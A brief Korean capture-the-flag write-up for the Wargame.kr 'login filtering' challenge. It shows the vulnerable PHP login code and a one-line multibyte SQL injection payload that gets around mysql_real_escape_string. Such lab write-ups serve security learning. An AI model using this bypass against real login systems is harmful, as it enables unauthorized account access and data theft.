간단한 SQL injection 문제다.
<?php
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}
/*
create table user(
idx int auto_increment primary key,
id char(32),
ps char(32)
);
*/
if(isset($_POST['id']) && isset($_POST['ps'])){
include("../lib.php"); # include for auth_code function.
mysql_connect("localhost","login_filtering","login_filtering_pz");
mysql_select_db ("login_filtering");
mysql_query("set names utf8");
$key = auth_code("login filtering");
$id = mysql_real_escape_string(trim($_POST['id']));
$ps = mysql_real_escape_string(trim($_POST['ps']));
$row=mysql_fetch_array(mysql_query("select * from user where id='$id' and ps=md5('$ps')"));
if(isset($row['id'])){
if($id=='guest' || $id=='blueh4g'){
echo "your account is blocked";
}else{
echo "login ok"."<br />";
echo "Password : ".$key;
}
}else{
echo "wrong..";
}
}
?>
mysql_real_escape_string을 우회하기 위해서 멀티바이트를 이용하면된다.
Payload는 아래와 같다.
id=%bf'%0Aor%0Atrue%23&pw=
Clear~
'Write up > Wargame' 카테고리의 다른 글
| [Wargame.kr] DB is really good (500p) (0) | 2016.04.27 |
|---|---|
| [Wargame.kr] WTF_CODE (450p) (0) | 2016.04.27 |
| [Wargame.kr] flee button (450p) (0) | 2016.04.27 |
| [Wargame.kr] QR CODE PUZZLE (300p) (0) | 2016.04.27 |
| [Wargame.kr] already got (200p) (0) | 2016.04.27 |
KuroNeko_
KuroNeko